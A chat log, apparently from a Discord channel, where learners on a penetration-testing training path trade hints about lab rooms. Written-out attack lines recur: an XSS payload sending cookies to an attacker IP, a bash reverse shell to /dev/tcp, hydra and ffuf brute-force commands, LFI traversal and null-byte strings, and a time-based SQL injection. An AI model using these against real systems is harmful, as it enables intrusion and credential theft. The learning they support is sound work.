#junior-pentester-path

1 messages ยท Page 18 of 1

shadow echo
#

So you did python3 47887.py http://10.10.148.177 and that's what you get? As I just tried it on my own right now and it was working just fine. Have you altered the file in any way?

rapid kite
#

or maybe i got the wrong exploit?..

shadow echo
rapid kite
#

didnt author the file though.

#

hmm let me try rm and download it again..

wild sundial
#

try with this | mount -o rw IP:/tmp /tmp/test

shadow echo
next lanceBOT
#

Gave +1 Rep to @shadow echo

untold cargo
shadow echo
shadow echo
rapid kite
untold cargo
shadow echo
rapid kite
wild sundial
rapid kite
untold cargo
#

like i saw other examples on youtube and understood it but i can't get past this &x= part

cold iris
#

oh i love web academy

rough ore
cold iris
#

The answer is actually in the tasks you did above

untold cargo
#

if i try to remove the url and just leave the flag it gives me a 504 server error

shadow echo
wild sundial
#

u must run it from ur attacking machine

untold cargo
shadow echo
deft valley
#

guys, how did u switch to jack's profile? dll task

untold cargo
#

yeah still not able to

#

i understand that &x= will turn it into ?x=

deft valley
#

understand the structure and apply it

untold cargo
wild sundial
storm lance
#

hey guys, anyone can walk me through lfi challenge 3 ?

rough ore
storm lance
#

Yes I did but I think I'm stuck

#

i checked the prev questions about it

#

i did everything but i failed again

#

||POST Request ?||

#

Unfortunately Yes ๐Ÿ˜„

hollow pumice
#

Anyone around?

#

dang

#

I'll come back later then

#

๐Ÿ˜„

#

@steel nymph have you done the XSS challenge?

#

I created a ticket with the injected script. Waited a minute....nothing on nc

#

verified my IP and port.

rapid kite
#

Is it just me or do we keep getting pentester titles, freeze etc repeatedly?

hollow pumice
#

@rapid kite that's how odds work, right?

wild sundial
wheat wigeon
hollow pumice
#

@steel nymph yes

rapid kite
#

darn it, im one of the unlucky ones i guess :/

wheat wigeon
#

Or it doesn't update?

rapid kite
#

all 0 claimed for me

wheat wigeon
hollow pumice
#

@steel nymph noted. Booting the attack box ๐Ÿ˜ฆ

wheat wigeon
hollow pumice
#

@steel nymph yeah, not sure why I thought i needed the attack box ๐Ÿ˜„

deft valley
storm lance
wheat wigeon
#

Can anyone hit me up with the HYDRA bruteforce of the nmap rooms? its gonna take ages to end

ember yarrow
#

I gotchu

wheat wigeon
#

Like literally it's gonna take 1538 hours XD

ember yarrow
#

Wait

#

Did I read your message wrong

#

Or did you edit it :KEKW:

untold cargo
#

yeah i'm not getting past through it

#

can someone guide me out of it

wheat wigeon
#

Just the lazie password

#

Yeah

#

Nope

#

said nmap because its near the rooms of nmap

#

hydra -l lazie -P /usr/share/wordlists/rockyou.txt 10.10.98 imap

#

its bruteforcing

#

but

#

[STATUS] 155.43 tries/min, 1088 tries in 00:07h, 14343343 to do in 1538:03h, 16 active

#

You can tell

#

XDXDD

wild sundial
#

10.10.98?

wheat wigeon
#

wait

#

What the actual fuck

#

LOL

hollow pumice
#

๐Ÿ˜„

wheat wigeon
#

Okay i guess that was wrong LMAO

#

how was it even working

#

ty btw

storm lance
#

@steel nymph i think i am still lost, i am sending post request from inspector in my browser

wheat wigeon
#

got it for the next time! Ty

next lanceBOT
#

Gave +1 Rep to @steel nymph

hollow pumice
#

@steel nymph do you happen to know if the injection has to be on a specific ticket ID? I'm still not getting anything even with the THM capture tool (but it displays my cookie when I view the ticket).

#

๐Ÿ‘

shadow echo
hollow pumice
#

@shadow echo ok.
I can see my cookie gets sent when I view the ticket. So it must be the correct payload. right?

storm lance
#

Can I Dm you @steel nymph ? still i cant make it work

modest arch
#

hack the planet

hollow pumice
#

@shadow echo @steel nymph finally got it! Thanks for the help

next lanceBOT
#

Gave +1 Rep to @shadow echo

mystic fulcrum
#

do anyone got the last flag of sq;_injection room

#

can you help me out

#

I have find the table_name

#

what should I do after that

jade lodge
#

how were supposed to know this? i tried looking up the referenced GitHub page and I didn't see it there either.

mystic fulcrum
#

Task 8

#

level 4

jade lodge
#

ahh. it IS in task5. i only looked up until task4 since they said it was the same machine

#

thanks

next lanceBOT
#

Gave +1 Rep to @steel nymph

mystic fulcrum
#

blind sqli-time based

modest arch
#

So close

#

Task 4 of win privesc

#

Just gotta keep pushing through

noble rose
#

SSRF is driving me nuts, when submitting a request the &x= is not changing to ?x=

#

what should i do

#

i am

#

it stays the same

viral token
#

Stuck on LFI Challenge Task1
trying DEV Console>Network. Changing Method to POST and Query String: file=../../../../etc/flag1

But, no luck with error or flag. any clue?

viral token
#

I am putting in on URL section next to Method

#

/challenges/chall1.php?file=../../../../etc/flag1

#

okay

modest arch
#

need space

#

file=*../../../../etc/flag1

#

after parameters always one space

viral token
#

thank you @steel nymph ๐Ÿ™‚

next lanceBOT
#

Gave +1 Rep to @steel nymph

ionic crag
#

I've never heard anyone claim that and I've never put a space like that

noble rose
#

what space

#

why space

#

man i am learning alot, fuck uni

#

THM for da win

storm lance
#

thank you @steel nymph is the best

next lanceBOT
#

Gave +1 Rep to @steel nymph

noble rose
#

Thanks @steel nymph

next lanceBOT
#

Gave +1 Rep to @steel nymph

noble rose
#

nice thanking people gives them rep

#

hahah

loud spire
#

Which button would we choose to send an intercepted request to the target in Burp Proxy?

pale parcel
#

hi
in linuxprivesc room of junior-pentester-path i cannot find the answer of this question What vulnerability seem to affect the kernel of the target system? (Enter a CVE number)
i searched in exploit-db and i found 2015-1328, but it seems to be incorrect

eager grotto
#

File Inclusion Task 4, Q2.... am just not getting what to do...cant seem to figure out what the file is with includes. Help plesae

loud spire
pale parcel
#

ow thankssss

#

and i've got one more question

#

in protocols and servers room, i cannot connect to telnet via this command:

#

telnet ip 80

#

it says that your connection is closed by foreign host

loud spire
#

PM

near solar
#

did I miss something? (wouldn't suprised me)
I cannot seem to find the user/pass to get on the windows privesc box on task2

#

thanks, now i feel lame for even asking, haha

#

my password file had that password in it, i just didn't try that user ๐Ÿ™‚

#

well i wanted to ask before i used a bigger file

sterile crescent
# loud spire anyone ?

i think that it would be the forward button, although i dont have it open right now so i cant verify

loud spire
#

o

#

ok

shell lintel
#

@steep bolt @modest arch I also got that info twice Tickets for this room already awarded These time it happened with Passive Reconnaissance room, I've tried to reset room progress after that message but the same info was shown. Maybe it gives you tickets you already have ?

steep bolt
#

so when you see this notification, just go to the Tickets on your public profile and check

verbal scroll
#

Hey guys, I'm having issues with the LFI Task 8 - Challenge 2. I've tried searching through this room and I've managed to change the cookie and can view the warning messages, however, I've tried variations of the path as the cookie's value and I'm not making any progress. Anyone have any hints?

shell lintel
steep bolt
#

maybe you got again 1 day streak freeze and 7 day streak freeze?

modest arch
#

Hi guys! How do you log with Jack's account in Windows Privesc, task 5?

shell lintel
steep bolt
#

I got like 10 tickets of 1 day freeze...

verbal scroll
#

I did try the same path with and without the nullbyte to remove the .php that it's adding, but no matter what I try I don't end up with a flag

tiny bluffBOT
verbal scroll
#

Will do! Gonna try a couple more things first real quick and if that doesn't work I'll do that. Thank you!

next lanceBOT
#

Gave +1 Rep to @steel nymph

shell lintel
hexed coral
#

This cookie task is giving me a headache

#

Im all out of options

modest arch
#

For Windows Privesc, the command "sc stop dllsvc & sc start dllsvc" does not work, because "&" is not allowed. I tried to break the command into two commands but nothing happened except it has created two new files named "stop" and "start". Also, I can't try to log as Jack, I can only try to log as "Administrator" or "admin_account".. i'm a bit confused! ^^

sterile crescent
modest arch
#

I'm trying in powershell! should be in cmd prompt? ^^'

sterile crescent
#

i dont like how windows splits powershell and cmd commands, personally. gets annoying

#

oh wait it should be -credential "" my b

sterile crescent
modest arch
#

thanks! I will try! I thought all the commands were throught powershell.. !

sterile crescent
#

nope, they're not

#

powershell is scripting, and cmd.exe is for actually controlling the computer. its funky

lusty bolt
#

I mean, powershell can control the computer

hexed coral
#

Yes

#

I have...maybe im not understanding it

viral token
#

Need some clue with LFI flag3.
Trying Change method to POST on inspector and input ?file=../../../../etc/flag3%00 on form. But, no luck its showing Warning: include(?file=../../../../etc/flag3%00.php ! Why its showing .php after using Null Bytes!

hexed coral
#

you are still using .php

sterile crescent
viral token
hexed coral
#

cookie value of admin + whatever else i try just not working lol....

viral token
sterile crescent
# viral token I am not good at using burp yet

I'll try and give you more steps to get through it || so when you grab it with the interceptor, you can pass it over to the repeater. in the repeater, you can see what's getting sent and how it was changed from your original input. you can change it in the repeater and then press the "forward" button to send it through ||

modest arch
#

Hi guys, I am stuck in SQL-Injections. I'm not able to find the right query in "Blind SQLi - Time Based" . May someone help?

sterile crescent
hexed coral
knotty walrus
viral token
red wraith
#

just change admin to some different thing and see what happens

knotty walrus
#

hydra brute forcing for 15 min

sterile crescent
knotty walrus
#

I am brute forcing with a wordlist

#

what do you mean?

modest arch
sterile crescent
#

oh then thats not brute forcing

knotty walrus
#

oh

#

it is the dictionary attack right

red wraith
sterile crescent
modest arch
sterile crescent
#

bruteforce would take forever with thm so its not worth it

#

anyway, what wordlist are you using? 15 minutes is a long time

#

for THM that is

hexed coral
#

Who available for dm regarding LFI Task 8?

knotty walrus
#

I am using the rockyou.txt

#

for every lab .D

hexed coral
#

I figured it out but not sure why it is how it is

verbal scroll
#

I also have the same question as @hexed coral

hexed coral
#

Seems like an incorrect # of paths

sterile crescent
viral token
#

I just finished lfi 2 stack on 3

knotty walrus
#

|| hydra -l lazzie -P /usr/share/wordlists/rockyou.txt 10.10.125.147 imap ||

#

this is the code

#

I dont think there is smth wrong with this

#

is it using cpu or gpu as a source?

sterile crescent
#

but that looks fine, just seems like its taking oddly long. is imap on a nonstandard port?

#

like does it give you any response

acoustic spindle
#

has anybody had trouble accessing the acmeitsupport webiste from their attackbox?

knotty walrus
#

sorry.

#

yeah it is trying

sterile crescent
red wraith
sterile crescent
modest arch
acoustic spindle
red wraith
sterile crescent
acoustic spindle
#

thanks

sterile crescent
#

np

dusk thistle
#

How do you find what tickets you have already earned?

sterile crescent
dusk thistle
#

@sterile crescent thank you for that. I've been pulling my hair out on the LFI room and used up all my brain for tonight lol. cheers.

next lanceBOT
#

Gave +1 Rep to @sterile crescent

verbal scroll
#

I was able to figure out LFI Task 8 Flag2, but I'm confused as to why it's ||4 directories deep and not 3 (going off the current path shown)|| can anyone help clarify?

#

I got it by mostly guessing, but I'd like to understand it

red wraith
knotty walrus
next lanceBOT
#

Gave +1 Rep to @red wraith

verbal scroll
red wraith
verbal scroll
#

I guess I'm mostly just not clear on why the 'current path' isn't what I use to determine how many directories I need to move up. The current path it's showing is one fewer directories than I actually needed to move

sterile crescent
verbal scroll
#

Oh....

sterile crescent
#

yeah

#

its a really weird funky thing, but since the file isn't directing you out, you have to drop out the file first

verbal scroll
#

I may have just been staring at this too long, but I'm not sure I understand what you mean by the file not directing me out

sterile crescent
#

its a programming thing. normally when an app is reaching out for a directory, it just reaches out on its own. you have to exit the file yourself

#

so one set of ../ takes you from /var/www/html/file.html to /var/www/html
if that makes sense

red wraith
#

good explanation

sterile crescent
#

when you factor in the file into your current path, it takes one more to exit out

verbal scroll
next lanceBOT
#

Gave +1 Rep to @sterile crescent

sterile crescent
verbal scroll
#

Is it always one additional to exit the file? Since the page itself is chall2.php, I need to exit out of the page, whereas if it wasn't the open page I wouldn't have to. is that correct?

sterile crescent
#

itโ€™s normally one additional to exit, but itโ€™s not always

#

I recommend starting with just one back and going up until you hit root

#

but thereโ€™s always an open page, the default will usually be something like index.php

verbal scroll
modest arch
#

Will the tickets box ever update with how many of the various rewards were claimed?

#

i'd like to know if OSCP / JPT have already been claimed

sterile crescent
#

I donโ€™t know. I recommend worrying about that when you potentially win

shadow echo
#

What issue?

modest arch
#

what's that supposed to mean

sterile crescent
# modest arch what's that supposed to mean

doing the stuff is more important than winning anything, and itโ€™s unlikely you win anyway. I didnโ€™t end up getting anything so it was just worry for nothing. just how I see it though

subtle forge
#

Thanks @steel nymph for all the valuable inputs today!

next lanceBOT
#

Gave +1 Rep to @steel nymph

modest arch
#

Hmmm, doing exercises is more important than career boosting certs

#

Nah I'll still go for the certs thank you

thick valley
#

For sql injection room, Task 8 (Blind SQLi-time Based) : I think I found the room byhaving a 5 second delay after

referrer=admin123' UNION SELECT SLEEP(5),2 where database() like '[MY_ANSWER]';--

but I dont gain access to the next site

sterile crescent
#

its a lot of trial and error, and time

thick valley
#

Thanks @steel nymph @sterile crescent

next lanceBOT
#

Gave +1 Rep to @steel nymph

thick valley
#

Thanks @sterile crescent

sterile crescent
#

good luck

thick valley
#

damn does this bot not give reps to multiple people

sterile crescent
#

robocop doesnt want me to get rep

thick valley
#

rip

sterile crescent
#

what does rep even do

thick valley
#

nothing lol

sterile crescent
#

welp doesn't really matter then

unique steppe
#

Okay I the robots.txt link and the sitemap.xml link are not loading

#

in content discovery? anyone else experienced this?

shadow echo
unique steppe
#

yeah

#

the robots.txt file was just working for me like 20 min ago

#

im connected to openVPN

sterile crescent
#

i wouldnt know of anything causing that issue, you can always restart the computer though

unique steppe
#

Well I did it through a VM and I restarted the VM but it still happening

sterile crescent
#

i mean the target computer

shadow echo
unique steppe
#

inside the VM

shadow echo
# unique steppe inside the VM

You could give that one a try: sudo ifconfig tun0 mtu 1200 in case it doesn't solve your issue just put it back to 1500.

unique steppe
#

not working sadcooctus

shadow echo
viral token
#

still stack with lfi flag 3. may i get some clue to pass it through?

shadow echo
viral token
#

as error

#

sending POST request through dev console>Inspector and putting ?file=../../../../etc/flag3%00 as input on form

deep pike
#

Hello everyone,
I am in the fileinc room on task 5. I believe my brain is shorting out but I can not figure out the 2nd question. For which function is causing the directory traversal. any help would be appreciated. Thanks

#

:O

#

yeah

#

thanks

#

I think I need a break after that one. Thank you lassi

next lanceBOT
#

Gave +1 Rep to @steel nymph

viral token
#

can't figure out!

shadow echo
shadow echo
viral token
#

but no luck

shadow echo
viral token
#

Method: POST
Query String: file=../../../../etc/flag3%00

shadow echo
viral token
#

I tried from Inspector eariler

viral token
shadow echo
viral token
#

I am changinf URL too

viral token
shadow echo
viral token
#

file=../../../../etc/flag3%00

shadow echo
# viral token file=../../../../etc/flag3%00

Alright, so there is one more thing for you to figure out now, as I assume the initial request that you edited in the network tab was a GET request, you are missing a header now. So you need to figure out what header you have to add for the POST request.

viral token
#

It is POST as I see

shadow echo
rough ore
#

Done it was fun.Most hard and enjoyable was LINUX PRIVESC

shadow echo
modest arch
#

Hey @here can I get some help with the last part of Task 6 on the Windows PrivEsc? || I'm having a hard time finding what the name of the executable is supposed to be, I assumed it would be unquotedpathservice.exe but that's not what it wants from me.|| Any ideas?

Edit: I ended up just brute forcing it but would appreciate insight on how to actually get it

#

OH

#

I mis read that at first. Thank you

next lanceBOT
#

Gave +1 Rep to @shadow echo

modest arch
#

Man, my freaking payload doesn't wanna work ๐Ÿ˜ข

#

nvm, when in doubt in windows just swap between cmd and powershell

#

always does magic

viral token
#

Do I need to host a file on a website to execute execute the hostname command via RFI?

#

yep, but I am using a shared IP, will it work?

modest arch
#

Yeah. Just python -m http.server, and usually the box already has something on port 80 so python -m http.server 1337 or something to specify the port

#

As long as you're on the VPN you'll be fine. Don't use your external IP

viral token
#

okay

modest arch
#

If you're using attackbox use the IP at the top of your terminal ๐Ÿ™‚

viral token
#

ok... I am using vpn

#

should I make a bash script?

#

to know the hostname?

#

okay

main yew
#

can somebody help me with linux privesc?

#

i tried to privesc with at and base

#

and didnt worked

#

i found passwords in shadow file

#

but is encrypted in sha512

#

and i cannot decrypt i dont know how

#

task 7

#

yes i get that flag

#

i tryed a lot of ways

#

yea now im trying that

#

now worked

#

i tryied from another site and didnt worked

viral token
river ore
#

I finally got past the phone verification.. I'm having the same issues as you capt. jack

#

Have you verified that if you put that path into your browser you are presented with the file?

viral token
#

yea

#

it live on that link

shadow echo
river ore
#

For me, I can hit the file via my local ip/filename but all I get from the playground is "File Content Preview of http://10.0.2.15/rfi.txt" then nothing

viral token
ember yarrow
#

0.0.0.0 usually means all interfaces

shadow echo
# viral token I am using updog

No clue what that is, but if you try to include that URL in the RFI, how should that get resolved to your machine/ updog thing?

river ore
viral token
river ore
#

If I'm right, if you ping 0.0.0.0 from your webserver, you should get the loopback ip address returned

#

So I don't think it'll work

viral token
#

I can access this server from other machine of my nextwork

floral magnet
#

I'm trying to do the authentication bypass room and the ffuf command doesn't seem to be working. I was using the provided command ffuf -w /usr/share/wordlists/SecLists/Usernames/Names/names.txt -X POST -d "username=FUZZ&email=x&password=x&cpassword=x" -H "Content-Type: application/x-www-form-urlencoded" -u http://MACHINE_IP/customers/signup -mr "username already exists"
Also it takes about an hour for it to fully run

#

and outputting to a file doesn't yield anything

faint cipher
#

Hey there on a side note, why is it that when I use a file from either google drive or drop box not being recognized when sharing them as raw links. From my understanding they are servers too right? Is it because it has to do with the HTTPS nature of the share link, can you please clarify?

river ore
#

For me, I don't think the external server is able to reach my file as when I attempt to reach the file locally, the terminal hosting the server state something like "GET /rfi.txt HTTP/1.1" 200 -"
But when I try from the playground nothing appears, so that to me states that the playground can't reach my file

#

Definitely need help with this :/

viral token
#

that txt file

tough basin
#

Get a meterpreter session on the target machine.

lavish thorn
#

you can use xhydra

viral token
river ore
lavish thorn
#

i beleave you can and it downloads the txt file not html

faint cipher
#

Yep able to curl

viral token
lavish thorn
#

nm

hexed coral
river ore
shadow echo
river ore
viral token
river ore
#

When trying the fri website, I get nothing back and the terminal doesn't show any sort of access attempt

shadow echo
hexed coral
#

Lfi + zap + fuzzer = best friend

river ore
#

I think I tried the box as well as url, but I'll give it another shot

#

Nope, same issue whether in box or url

#

||<?PHP hostname; ?>||

#

^^^payload

shadow echo
river ore
#

So if I understand you correctly, I literally need to ||put http://10.0.2.15/rfi.txt into the box then click "Include"||, yeah?

viral token
#

Its my device IP. I run updog server on my device. And, its showing 0.0.0.0:9090 as my server address. 192.168.10,107 is my device ip. and, i can access the file (http://192.168.10.107:9090/hostname.txt) from other device on my network.

shadow echo
hexed coral
#

Whats your tun0 ip? Is the one you use

river ore
#

Well I'm doing it correctly, but shouldn't the server be able to access it as I'm on the same vpn network? Or will I need to spin up an attack box vs using my kali box?

viral token
#

how can I host it on thm! I am using vpn, is not make my device as a device of thm nextwork?

viral token
#

also, what will be the content of the file?

hexed coral
#

capt, did you connect to THM openvpn?

viral token
shadow echo
hexed coral
#

you should be using your tun0 as ip

river ore
#

If we didn't have the vpn up, we shouldn't be able to access the playground at all

river ore
#

I'm sorry if I'm being obtuse, but I'm happy to do whatever you need to make progress

ember yarrow
#

ifconfig is depreciated

viral token
#

did it earlier and got 192.168.10.107

ember yarrow
#

Use ip a s tun0

viral token
shadow echo
river ore
#

Progress! I can see the requests from the playground server now, but I'm guessing my payload is incorrect as I'm not getting the hostname

river ore
viral token
#

ip a s tun0
4: tun0: <POINTOPOINT,MULTICAST,NOARP,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UNKNOWN group default qlen 500
link/none
inet 10.9.3.225/16 scope global tun0
valid_lft forever preferred_lft forever
inet6 fe80::826f:ff2:73a9:aae5/64 scope link stable-privacy
valid_lft forever preferred_lft forever

#

not working

#

and on ifconfig it sowing inet 192.168.10.107

river ore
#

I really appreciate the help! Seriously, thank you very much

next lanceBOT
#

Gave +1 Rep to @steel nymph

viral token
shadow echo
viral token
shadow echo
river ore
river ore
#

Test if you can access the file from your browser using that ip

viral token
faint cipher
#

On the attack box, spin up a server on a port of your choice, the use ifconfig once to check your eth0 address. Once you copy the URL paste it in the playground ans the file should execute. This worked for me on the attack box

viral token
#

i am going to try attackbox

viral token
river ore
#

No, it's something else, I'm working it out atm

#

Got it!

viral token
#

congratulations

#

I am still stuck!

river ore
#

@viral token The payload I posted earlier is almost correct, you gotta do something to execute the hostname command

viral token
#

ok

#

i am trying from attackbox, but, couldn't get the file!

#

its showing same 0.0.0.0 on attackbox too and guess what there is no tun0 ip attackbox.

shadow echo
tepid raft
#

I donโ€™t catch

next lanceBOT
#

Gave +1 Rep to @shadow echo

floral magnet
#

Any chance someone can correct knows why ffuf isn't working in the authentication bypass room? I'm using the example but for some reason it isn't finding anything and is also taking an hour at a time to run

#

This is the command: ffuf -w /usr/share/wordlists/SecLists/Usernames/Names/names.txt -X POST -d "username=FUZZ&email=x&password=x&cpassword=x" -H "Content-Type: application/x-www-form-urlencoded" -u http://10.10.140.70/customers/signup -mr "username already exists" -o valid_usernames.txt

#

The output file doesn't list anything useful mostly just configuration stuff.

viral token
floral magnet
#

That's just for outputting to a file

#

otherwise it doesn't seem to output anywhere

#

Just kinda ends

#
{"commandline":"ffuf -w /usr/share/wordlists/SecLists/Usernames/Names/names.txt -X POST -d username=FUZZ\u0026email=x\u0026password=x\u0026cpassword=x -H Content-Type: application/x-www-form-urlencoded -u http://10.10.140.70/customers/signup -mr username already exists -o valid_usernames.txt -o valid_username.txt","time":"2021-10-26T01:16:37+01:00","results":[],"config":{"autocalibration":false,"autocalibration_strings":[],"colors":false,"cmdline":"ffuf -w /usr/share/wordlists/SecLists/Usernames/Names/names.txt -X POST -d username=FUZZ\u0026email=x\u0026password=x\u0026cpassword=x -H Content-Type: application/x-www-form-urlencoded -u http://10.10.140.70/customers/signup -mr username already exists -o valid_usernames.txt -o valid_username.txt","configfile":"","postdata":"username=FUZZ\u0026email=x\u0026password=x\u0026cpassword=x","delay":{"value":"0.00"},"dirsearch_compatibility":false,"extensions":[],"filters":{},"follow_redirects":false,"headers":{"Content-Type":"application/x-www-form-urlencoded"},"ignorebody":false,"ignore_wordlist_comments":false,"inputmode":"clusterbomb","cmd_inputnum":100,"inputproviders":[{"name":"wordlist","keyword":"FUZZ","value":"/usr/share/wordlists/SecLists/Usernames/Names/names.txt"}],"inputshell":"","matchers":{"regexp":{"value":"username already exists"}},"maxtime":0,"maxtime_job":0,"method":"POST","noninteractive":false,"outputdirectory":"","outputfile":"valid_username.txt","outputformat":"json","OutputCreateEmptyFile":false,"proxyurl":"","quiet":false,"rate":0,"recursion":false,"recursion_depth":0,"recursion_strategy":"default","replayproxyurl":"","stop_403":false,"stop_all":false,"stop_errors":false,"threads":40,"timeout":10,"url":"http://10.10.140.70/customers/signup","verbose":false}}```
copper garnet
#

it doesn't echo out the output?

floral magnet
#

Nope

#

That's what it outputs but that doesn't give any usernames

viral token
#

it will show you the output on the screen

#

and, if you want to get a file read ffuf man page

prime summit
viral token
floral magnet
#

I restarted the machine and that did the trick for some reason

#

Only took 5 seconds to run rather than the hour I've been dealing with so far

viscid igloo
#

are you guys working on the Fileinc challenge seeing a 405 error?

floral magnet
#

I was trying to do the auth bypass room

tardy phoenix
#

The room cross-site scripting task 8 I am not recieving any cookie neither in listener nor in tryhackme request catcher.
Btw by tapping the ticket ID I get my own cookie but we need the support-staff cookie.
Could anyone please help??

unique steppe
#

I just forgot to click to redeem tickets, did I have to click them

timber ledge
lavish thorn
#

windows privesc can someone explain how to download the powersploit on the web based windows machine im suppose to exploit i get nothing but errors

inner ether
#

Anyone having issues with Windows PrivEsc DLL Hijacking - it will not let me start the service

sleek hawk
#

@tardy phoenix I was getting the base64 encoded session cookie, decoded it, but when I submit the answer it will not accept it. I was using the netcat method on my vm with the browser used also in my vm.

junior canyon
#

There is this line in active recon (Task 6 final paragraph - Last line) "You can find a recording of the process below. Note that the listening server is on the left side of the screen." (I think there is no video/recording?)

winter spade
#

Is anyone else running into this in the XSS room? I've restarted the AttackBox twice just in case but to no effect.

dreamy sundial
#

What is uname password for windows priesc room

#

The last 1

modest arch
#

how much time until the giveway is over?

dreamy sundial
gloomy veldt
#

Hello guys, I'm doing the LFI room and I'm sooo stuck at the third challenge

#

the one where everything seems to be filtered

#

Do you have any hints?

dreamy sundial
#

You want hint?

gloomy veldt
#

yep

dreamy sundial
#

Hint request

modest arch
oblique needle
gloomy veldt
#

yep, the third challenge

inner ether
viral token
gloomy veldt
#

i managed to get /etc/passwd by sending the parameter in the POST request

viral token
#

are you using dev tools or burp?

viral token
gloomy veldt
gloomy veldt
viral token
#

try to play with directory location

#

and, you can try dev tool

gloomy veldt
#

I was literally retrieving the wrong number of flag

#

Now I got it

viral token
#

congrats!

sullen perch
#

what am i doing wrong?

viral token
sullen perch
#

what would be the path?

#

Post ||/challenges/index.php/etc/flag1||

#

???

#

@viral token

viral token
#

read LFI tutorials again from the dot-dot-slash section @sullen perch

viral token
#

Did not getting nc incoming by using this xss script: </textarea><script>fetch('http://10.9.3.225:9001?cookie=' + btoa(document.cookie) );</script></textarea>

need some clue

modest arch
#

I had an issue with this too and eventually just restarted the machine, used the listener at 10.10.10.10 and made a new ticket.

#

No issues with netcat with any other room, so I'm not sure why it went weird

wild sundial
#

remove btoa() and retry it

#

just document.cookie should work

viral token
#

I tired THM request catcher and got the stuff-session

#

may be something wrong with nc connection

viral token
#

btoa() command base64 encodes the victim's cookies.

wild sundial
#

should also work with with btoa() too

viral token
lone pecan
#

Complete noob here. Doing the JR PenTester path and stuck on the 'Authentication Bypass' (Task 3). Can anyone offer assistance/walkthrough to offer a different perspective in it?

modest arch
lone pecan
viral token
#

also, make sure the terminal is in the same directory as the valid_usernames.txt file.

sterile reef
#

Can someone help Iโ€™m missing something

copper hornet
#

Maybe re-reading this paragraph?

subtle herald
#

can someone send link of hack me?

frail umbra
#

need help for the room Protocols and Servers 2

subtle herald
#

ok

shy elk
#

Linux PrivEsc task 9 Privilege Escalation: Cron Jobs. I added the bash in target backup.sh and then opened the listener from Linux. But the job seems not running. Anyone can help?
The backup.sh file contains:
cd /home/admin/1/2/3/Results zip -r /home/admin/download.zip ./* #!/bin/bash -x bash -i >& /dev/tcp/<my ip address>/1111 0>&1

steel ice
#

did you make it executable?

shy elk
#

It shows ./backup.sh: connect: Connection timed out

idle bison
#

Which IP did you put there?

#

Tun0?

shy elk
#

I put eth0

#

eth0 inet

idle bison
#

Are you using the attackbox or THM Kali? Or are you using your own machine?

shy elk
#

I am using Kali Linux VM

idle bison
#

Ok, so you need to use your tun0 IP. That's the only address that the target machine can talk to you using

shy elk
#

Got it. Thank you

#

๐Ÿ‘

daring smelt
#

Can any please help me in
Protocols and Servers 2 : TASK 6 question plz

#

When I enter this command (hydra -l lazie -P /usr/share/wordlists/rockyou.txt Machine_ip ssh) as told in explanation it should not take more than 5 min

#

It has been 14 min now

#

O sorry I did not see it. My bad

#

Thanks a lot I was looking since 1 hr

next lanceBOT
#

Gave +1 Rep to @steel nymph

prisma sphinx
#

I didnt get ticket after completing the room..

#

oh

lusty bolt
#

I don't think so, I've had that message before and not gained any tickets

#

Hmm maybe I guess

tall siren
#

hello, I need help with Windows priv escalantion room task 6. It says: "Obtain Administrator privileges on the target machine. What is the content of the flagUSP.txt file?"

#

I have already established a meterpreter session succesfully, but when trying to escalate using "getsystem", all of the methods fail

#

I have also used all of the available exploits that appear when I use "search uac" but none of them seems to work :(

#

sb has got the room complete?

idle bison
#

Those methods are for when you already have admin privs

tall siren
#

and for when you dont have admin privs?

tall siren
idle bison
#

Escalate

tall siren
#

yeah but how

vital depot
#

Help with flag2 please.
Using Burp I've changed the cookie value to|| "admin"||. I've input invalid cookie values to see current path - ||/var/www/html/chall2.php||.
So I changed URL to - ||*http://10.10.57.78/challenges/chall2.php?file=../../../../etc/flag2*||
Other than the two values "Guest" & "admin" values, I'm unsure how else I could alter cookies to find the flag.
Does Content-type: also need to be added on this challenge?

steel ice
vital depot
#

That's a negative.

tall siren
vital depot
next lanceBOT
#

Gave +1 Rep to @steel ice

random rapids
#

Hey guys, I am stuck in the authentication by pass room of the jr. Penetration tester path where we have to bruteforce and use ffuf and find the username and password .
I know am writing the correct command. When I use the filter -fc 200, I can see that one matching credential is found, but when I use the same command and use ">> filename.txt" to fetch the output on the txt file. There is no output seen there

#

Can anyone help me with this?

#

What am I doing wrong here ?

shadow echo
random rapids
#

When I don't use the -fc 200 switch to capture all the http 200 msgs, and then use >>filename.txt to print the output. At that time it works.

shadow echo
pearl bolt
#

thank you...I returned to this and found this to work for me too....F..... CVE-(year)-(number) format seems to work for anyone on Task 3 of Linux Priv Esc.

next lanceBOT
#

Gave +1 Rep to @lean ridge

rustic galleon
#

Hi. I need help with Linux PrivEsc room task 6. The 'simple c' code doesnt give the root permission. And i already research on google but no luck.

Hopefully someone can help me.

hasty hamlet
drifting drum
rustic galleon
drifting drum
#

As far as I know you don't need to crack it

wild sundial
#

lol my bad
i mean the plaintext password xD

tall siren
next lanceBOT
#

Gave +1 Rep to @full escarp

modest arch
#

gcc -fPIC -shared -o shell.so shell.c -nostartfiles

rustic galleon
modest arch
#

OK now i see and understand thanks so much !

unkempt bridge
#

you got it?

#

you got it?

dusty iris
#

yes

half monolith
#

Hi, at the cross site scripting room I used the supplied xss payload, but I did not get a response even from myself I get no response I used the log catcher and nc on my local machine any ideas?

hazy kraken
#

the Javascript console might tell you why it is not working

half monolith
#

It says Type Error and mixed content blocked

#

This it stands right before the task </textarea><script>fetch('http://{URL_OR_IP}?cookie=' + btoa(document.cookie) );</script>

#

It's the last Task 8

brittle gyro
#

can anybody give me a tip to where the flag is on this question:

Obtain Administrator privileges on the target machine. What is the content of the flagUSP.txt file?

#

feel free to DM me, thank you

half monolith
#

I forgot to tell in this error it also says NetworkError when attempting to fetch resource

brittle gyro
#

thanks I just found it, everytime I do a search like this it kills my shell though for some reason. Or I'm just not patient enough to let it finish

half monolith
#

Yes and with the tun0 ip

wheat wigeon
#

Hey may I get some help with a NTLM hash?

It asks for Pirate's hash and i did the hashdump, got rid of the user and the PID but the NTLM isn't working

#

I know i must be doing something wrong but i dont fall for it rn

#

Yeah the LM:NT

hazy kraken
#

@steel nymph do you have a working payload? I found a slightly different way to get the cookie, but would be really interested how to bypass this browser blocking, if it is possible

wheat wigeon
#

Imma check it out anyway, ty!

half monolith
half monolith
wheat wigeon
#

nvm didnt see it

#

mb

wheat wigeon
half monolith
#

I restarted it earlier but I can try again

sullen perch
#

task 8 challenge

#

what shoould the url be?

hexed coral
sullen perch
hexed coral
#

`/challenges/chall1 or 2

#

You are making a post request to the index page

half monolith
#

Thanks after restarting it worked immediately

next lanceBOT
#

